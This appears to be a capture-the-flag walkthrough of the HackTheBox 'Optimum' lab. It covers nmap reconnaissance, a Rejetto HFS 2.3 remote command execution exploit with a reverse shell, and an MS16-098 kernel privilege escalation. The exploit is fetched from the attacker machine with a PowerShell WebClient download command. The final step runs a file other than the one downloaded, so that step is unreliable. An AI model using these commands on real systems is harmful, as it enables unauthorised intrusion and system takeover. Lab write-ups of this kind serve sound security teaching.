An easy Windows box from HackTheBox: a public CVE PoC against the web server gives initial access, and a second PoC (a Windows kernel exploit) gives SYSTEM.

Optimum

Recon

Running the usual nmap scan:

sudo nmap -sC -sV -oA nmap/optimum 10.10.10.8
Nmap scan report for 10.10.10.8  
Host is up (0.038s latency).  
Not shown: 999 filtered tcp ports (no-response)  
PORT   STATE SERVICE VERSION  
80/tcp open  http    HttpFileServer httpd 2.3  
|_http-title: HFS /  
|_http-server-header: HFS 2.3  
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Only port 80 is open, running a service called “HTTP File Server” (Rejetto HFS) version 2.3. Run searchsploit against it:

searchsploit httpfileserver 2.3

which shows a remote command execution exploit for this version, written as a Python script:

Rejetto HttpFileServer 2.3.x - Remote Command Execution (3)

Exploitation

Download the exploit to the current directory and run it with a ping back to the attacking machine; execution through HFS is blind (the command output is not returned in the HTTP response), so the ping is the check that the command actually ran:

python hfs.py 10.10.10.8 80 "ping 10.10.14.11"

with tcpdump on the attacking machine listening for the ICMP echo requests:

sudo tcpdump icmp

The one from searchsploit didn’t work, but another Python script for the same vulnerability from Exploit-DB did, and it has a reverse shell baked in. That gives a shell on the box as “kostas”: commands injected through HFS run with the privileges of the HFS process, so that is the account the service runs under.

Get the system information (OS version, architecture and installed hotfixes) with

systeminfo

Save the output to a text file and run it through Windows Exploit Suggester (wes-ng) after updating its vulnerability database:

wes -u

wes sysinfo

which reports the system as vulnerable to MS16-098, a Windows kernel-mode driver (win32k.sys) privilege escalation. As with any kernel exploit, a miss can crash the box, so check that the hotfix list really lacks the patch before running it.

Download the compiled exploit (41020.exe) from GitHub, serve it from the attacking machine over HTTP, pull it onto the box with PowerShell and execute it:

powershell -c "(new-object System.Net.WebClient).DownloadFile('http://10.10.14.11/41020.exe','C:\Users\kostas\Desktop\41020.exe')"
powershell 39719.ps1

and we are now SYSTEM.